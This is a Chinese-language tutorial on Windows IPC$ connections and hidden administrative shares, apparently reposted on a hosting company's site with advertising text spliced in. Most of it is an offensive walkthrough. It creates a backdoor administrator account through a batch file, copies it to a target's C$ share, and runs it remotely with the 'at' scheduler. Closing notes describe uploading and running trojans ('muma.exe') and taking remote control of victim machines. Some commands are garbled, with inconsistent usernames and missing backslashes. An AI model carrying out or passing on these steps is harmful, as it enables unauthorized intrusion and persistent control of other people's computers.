關(guān)于IPC$的使用筆記-創(chuàng)新互聯(lián)

IPC$(Internet Process Connection)是共享"命名管道"的資源，它是為了讓進程間通信而開放的命名管道，通過提供可信任的用戶名和口令，連接雙方可以建立安全的通道并以此通道進行加密數(shù)據(jù)的交換，從而實現(xiàn)對遠程計算機的訪問。IPC$是NT/2000的一項新功能，它有一個特點，即在同一時間內(nèi)，兩個IP之間只允許建立一個連接。NT/2000在提供了ipc$功能的同時，在初次安裝系統(tǒng)時還打開了默認共享，即所有的邏輯共享(c$,d$,e$……)和系統(tǒng)目錄winnt或windows(admin$)共享。所有的這些，微軟的初衷都是為了方便管理員的管理，但在有意無意中，導致了系統(tǒng)安全性的降低。
（1）為了配合IPC共享工作，Windows操作系統(tǒng)（不包括Windows 98系列）在安裝完成后，自動設置共享的目錄為：C盤、D盤、E盤、ADMIN目錄（C:\WINNT\）等，即為ADMIN$、C$、D$、E$等等，但要注意，這些共享是隱藏的，只有管理員能夠?qū)λ麄冞M行遠程操作。在MS-DOS中鍵入“net share”命令來查看本機共享資源。
（2）DOS的基本命令
DIR命令：列出當前路徑下的文件，常常用來查看想要找的文件是否在該路徑下。

站在用戶的角度思考問題，與客戶深入溝通，找到梓潼網(wǎng)站設計與梓潼網(wǎng)站推廣的解決方案，憑借多年的經(jīng)驗，讓設計與互聯(lián)網(wǎng)技術(shù)結(jié)合，創(chuàng)造個性化、用戶體驗好的作品，建站類型包括：網(wǎng)站設計、成都網(wǎng)站建設、企業(yè)官網(wǎng)、英文網(wǎng)站、手機端網(wǎng)站、網(wǎng)站推廣、主機域名、網(wǎng)站空間、企業(yè)郵箱。業(yè)務覆蓋梓潼地區(qū)。

CD命令：進入指定的目錄。比如，想進入E盤中的CODE文件夾，則在E:\>下鍵“CD CODE”命令。

常用的net命令：
net user：系統(tǒng)賬號類操作
net localgroup：系統(tǒng)組操作
net use：遠程連接、映射操作
net time：查看遠程主機系統(tǒng)時間
cls命令：清屏命令
netstart 命令：

（3）建立和斷開IPC$連接

留后門賬號
1、相關(guān)知識
①、什么是BAT文件？
BAT文件是在Windows系統(tǒng)中的一種文件格式，稱為批處理文件。簡單來說，就是把需要執(zhí)行的一系列DOS命令按順序先后寫在一個后綴名為BAT的文本文件中。通過鼠標雙擊或DOS命令執(zhí)行該BAT文件，就相當于執(zhí)行一系列DOS命令。
②、什么是計劃任務？
舉個例子，假設想在明天上午10點給電腦殺毒，但是正好明天上午10點要出去辦事，那怎么辦呢？這時候就要使用“計劃任務”這個功能，令計算機在明天上午10點自動執(zhí)行殺毒程序。計劃任務是Windows系統(tǒng)自帶的功能，可以在控制面板中找到。除此之外，還可能用命令行的方式來添加計劃任務。
③、相關(guān)DOS命令
copy命令：把一個文件拷貝到另一個地方，“另一個地方”可以是本地計算機的目錄、磁盤，也可以是另一臺主機的目錄或磁盤。
at命令：用來建立計劃任務。
net time命令：用來查看目標計算機的系統(tǒng)時間，以便使用計劃任務指定時間。
net user命令：用來管理計算機上面的賬號。
— 查看賬號命令：net user
— 建立賬號命令：net user name passwd /add
— 刪除賬號命令：net user name passwd /del
net localgroup命令：用來管理工作組。
2、實例：建立后門賬號
步驟一：編寫B(tài)AT文件。
打開記事本，鍵入“net user sysbak 123456 /add”和“net localgroup administrators sysback /add”命令，編寫好命令后，把該文件另存為“hack.bat”。下面對這兩個命令進行說明。
命令一：net user sysbak 123456 /add。該命令表示添加用戶名為sysback，密碼為123456的賬號。
參數(shù)說明：
“sysback”：用戶名
“123456”：用戶的密碼
“/add”：表示添加賬號
命令二：net localgroup administrators sysback /add。該命令表示把sysback添加到管理員組（administrators）。
參數(shù)說明：
“administrators”：表示管理員組
“sysback”：剛建立的用戶名
“/add”：表示添加賬號
步驟二：與目標主機建立IPC$連接。
使用命令：Net use \ip\ipc$ /user:用戶名 密碼
步驟三：拷貝文件至目標主機。
使用命令：copy FILE \IP\PATH
參數(shù)說明：
“FILE”表示本地的文件名
“IP”為目標主機的IP地址
“PATH”保存文件的路徑
打開MS-DOS，鍵入“copy d:\hack.bat \192.168.27.128\c$”命令copy命令執(zhí)行成功后，就已經(jīng)把D盤下的hack.bat文件拷貝到192.168.27.128的C盤內(nèi)。此外，也可以在圖形界面下把hack.bat復制、粘貼到目標主機中。
步驟四：通過計劃任務使遠程主機執(zhí)行hack.bat文件。
首先鍵入“net time \IP”命令查看遠程主機的系統(tǒng)時間，再鍵入“at \IP TIME COMMAND”命令在遠程主機上建立計劃任務。
參數(shù)說明：
IP：目標主機IP
TIME：設定計劃任務執(zhí)行的時間
COMMAND：計劃任務要執(zhí)行的命令
打開MS-DOS，鍵入“net time \192.168.27.128”命令。假設回顯的目標系統(tǒng)時間為13:33，然后根據(jù)該時間為遠程主機建立計劃任務。鍵入“at\192.168.27.128 13:45 c:\hack.bat”命令，該命令表示在下午13點45分執(zhí)行目標主機C盤中的hack.bat文件。計劃任務添加完畢后，使用命令“net use * /del”斷開IPC$連接。
步驟五：驗證賬號是否成功建立。等待一段時間后，估計遠程主機已經(jīng)執(zhí)行了hack.bat文件。下面通過建立IPC$連接來驗證是否成功建立“sysback”賬號。連接成功！說明管理員賬號“sysback”已經(jīng)成功建立。

結(jié)論：
（1）打開目標IPC$：
首先你需要獲得一個不依賴于ipc$的shell，比如sql的cmd擴展、telnet、***。當然，這shell必須是admin權(quán)限的。然后你可以使用shell執(zhí)行命令 net share ipc$ 來開放目標的ipc$。從上一問題可以知道，ipc$能否使用還有很多條件。請確認相關(guān)服務都已運行，沒有就啟動它（不知道怎么做的請看net命令的用法）。還是不行的話（比如有防火墻，殺不了）建議放棄。
（2）映射和訪問默認共享：
使用命令 net use z: \目標IP\c$ "密碼" /user:"用戶名" 將對方的c盤映射為自己的z盤，其他盤類推。 如果已經(jīng)和目標建立了ipc$，則可以直接用IP加盤符加$訪問。比如 copy muma.exe
\IP\d$\path\muma.exe ?；蛘咴儆成湟部梢裕皇遣挥糜脩裘兔艽a了：net use y: \IP\d$ 。然后 copy muma.exe y:\path\muma.exe 。當路徑中包含空格時，須用""將路徑全引住。
（2）連接上IPC$后：
能使用管理員權(quán)限的帳號成功和目標連接ipc$，表示你可以和對方系統(tǒng)做深入“交流”了。你可以使用各種命令行方式的工具（比如pstools系列、Win2000SrvReskit、telnethack等）獲得目標信息、管理目標的進程和服務等。如果目標開放了默認共享（沒開你就幫他開），你就可以上傳***并運行。也可以用tftp、ftp的辦法上傳。像dwrcc、VNC、RemoteAdmin等工具（***）還具有直接控屏的功能。如果是2000server， 還可以考慮開啟終端服務方便控制。

另外有需要云服務器可以了解下創(chuàng)新互聯(lián)scvps.cn，海內(nèi)外云服務器15元起步，三天無理由+7*72小時售后在線，公司持有idc許可證，提供“云服務器、裸金屬服務器、高防服務器、香港服務器、美國服務器、虛擬主機、免備案服務器”等云主機租用服務以及企業(yè)上云的綜合解決方案，具有“安全穩(wěn)定、簡單易用、服務可用性高、性價比高”等特點與優(yōu)勢，專為企業(yè)上云打造定制，能夠滿足用戶豐富、多元化的應用場景需求。

文章標題：關(guān)于IPC$的使用筆記-創(chuàng)新互聯(lián)
標題網(wǎng)址：http://muchs.cn/article0/dpjsio.html

成都網(wǎng)站建設公司_創(chuàng)新互聯(lián)，為您提供自適應網(wǎng)站、電子商務、動態(tài)網(wǎng)站、企業(yè)建站、網(wǎng)站設計公司、虛擬主機

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請盡快告知，我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場，如需處理請聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時需注明來源： 創(chuàng)新互聯(lián)